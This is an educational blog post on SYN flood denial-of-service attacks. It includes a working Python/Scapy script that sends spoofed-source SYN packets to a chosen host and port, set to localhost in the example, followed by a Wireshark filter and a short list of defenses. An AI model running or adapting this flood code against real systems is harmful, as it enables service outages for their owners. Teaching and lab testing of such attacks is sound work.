SYN flooding - The basic of DOS Attacks
Thilan Dissanayaka Computer Networking May 03, 2020

SYN flooding - The basic of DOS Attacks

SYN flood attack is a classic way to understand Denial of Service (DoS) attacks and how TCP resource exhaustion works. It’s a common attack vector in security assessments, and knowing how it works helps you defend against it effectively.

🚨 What Is a SYN Flood? In a normal TCP handshake:

arduino Copy Edit

  1. Client → Server: SYN
  2. Server → Client: SYN-ACK
  3. Client → Server: ACK ✅ In a SYN flood:

The attacker sends thousands of SYN packets without sending the final ACK.

The server waits for the ACK, keeping half-open connections in memory.

This exhausts server resources (connection table), leading to denial of service.

⚠️ Disclaimer This demo is for educational purposes only, and should only be run against your own machine or a controlled lab environment.

🔧 Requirements Python 3

Scapy (pip install scapy)

Root/admin privileges (sudo on Linux/Mac)

🧪 Python SYN Flood Script (Lab Only) python Copy Edit from scapy.all import * import random import time

def syn_flood(target_ip, target_port, packet_count=1000): print(f"Sending {packet_count} SYN packets to {target_ip}:{target_port}") for i in range(packet_count): # Randomize source port and IP to simulate spoofing src_port = random.randint(1024, 65535) src_ip = f"192.168.{random.randint(1, 254)}.{random.randint(1, 254)}" # Spoofed IP

    ip = IP(src=src_ip, dst=target_ip)
    tcp = TCP(sport=src_port, dport=target_port, flags='S', seq=random.randint(1000, 9000))

    pkt = ip / tcp
    send(pkt, verbose=0)
    
    if i % 100 == 0:
        print(f\"Sent {i} packets...\")

print(\"SYN flood complete.\")

Example usage

if name == "main": target_ip = "127.0.0.1" target_port = 65432 syn_flood(target_ip, target_port, packet_count=1000) 🔍 What This Does Sends 1000 SYN packets to the target.

Source IPs and ports are spoofed.

Target sees thousands of "clients" initiating connections but never completing them.

👁 View in Wireshark Open Wireshark and use filter:

ini Copy Edit tcp.flags.syn == 1 && tcp.flags.ack == 0 && tcp.port == 65432 Start your local server (on port 65432) to make it listen.

Run the script — you’ll see tons of SYN packets.

🧠 Real-World Defenses Against SYN Floods SYN cookies (don’t allocate memory until handshake completes)

Rate limiting suspicious IPs

Firewalls (e.g., iptables rules)

Intrusion Detection Systems (IDS)

🛡 Want to Try Mitigation? Let me know and I can walk you through:

Enabling SYN cookies in Linux

Using iptables to block floods

Logging suspicious TCP traffic

ALSO READ
Blockchain 0x000 – Understanding the Fundamentals
May 21, 2020 Web3 Development
Blockchain 0x000 – Understanding the Fundamentals

Imagine a world where strangers can exchange money, share data, or execute agreements without ever needing to trust a central authority. No banks, no intermediaries, no single point of failure yet...

Identity and Access Management (IAM)
May 11, 2020 Identity & Access Management
Identity and Access Management (IAM)

Who are you — and what are you allowed to do? That's the fundamental question every secure system must answer. And it's exactly what Identity and Access Management (IAM) is built to solve.

How I built a web based CPU Simulator
May 07, 2020 Pet Projects
How I built a web based CPU Simulator

As someone passionate about computer engineering, reverse engineering, and system internals, I've always been fascinated by what happens "under the hood" of a computer. This curiosity led me to...

Writing a Shell Code for Linux
Apr 21, 2020 Exploit Development
Writing a Shell Code for Linux

Shellcode is a small piece of machine code used as the payload in exploit development. In this post, we write Linux shellcode from scratch — starting with a simple exit, building up to spawning a shell, and explaining every decision along the way.

Exploiting a Stack Buffer Overflow on Windows
Apr 12, 2020 Exploit Development
Exploiting a Stack Buffer Overflow on Windows

In a previous tutorial we discusses how we can exploit a buffer overflow vulnerability on a Linux machine. I wen through all theories in depth and explained each step. Now today we are going to jump...

Access Control Models
Apr 08, 2020 Identity & Access Management
Access Control Models

Access control is one of the most fundamental concepts in security. Every time you set file permissions, assign user roles, or restrict access to a resource, you're implementing some form of access control. But not all access control is created equal...

Exploiting a Stack Buffer Overflow on Linux
Apr 01, 2020 Exploit Development
Exploiting a Stack Buffer Overflow on Linux

Have you ever wondered how attackers gain control over remote servers? How do they just run some exploit and compromise a computer? If we dive into the actual context, there is no magic happening....

Basic concepts of Cryptography
Mar 01, 2020 Cryptography
Basic concepts of Cryptography

Ever notice that little padlock icon in your browser's address bar? That's cryptography working silently in the background, protecting everything you do online. Whether you're sending an email,...

Common Web Application Attacks
Feb 05, 2020 Application Security
Common Web Application Attacks

Web applications are one of the most targeted surfaces by attackers. This is primarily because they are accessible over the internet, making them exposed and potentially vulnerable. Since these...

Remote Code Execution (RCE)
Jan 02, 2020 Application Security
Remote Code Execution (RCE)

Remote Code Execution (RCE) is the holy grail of application security vulnerabilities. It allows an attacker to execute arbitrary code on a remote server — and the consequences are as bad as it sounds. In this post, we'll go deep into RCE across multiple languages, including PHP, Java, Python, and Node.js.

AUTHOR
Thilan Dissanayaka

Thilan Dissanayaka

Security Engineer at WSO2. Passionate about clean code and cybersecurity. Building secure, scalable applications with modern technologies.

CATEGORIES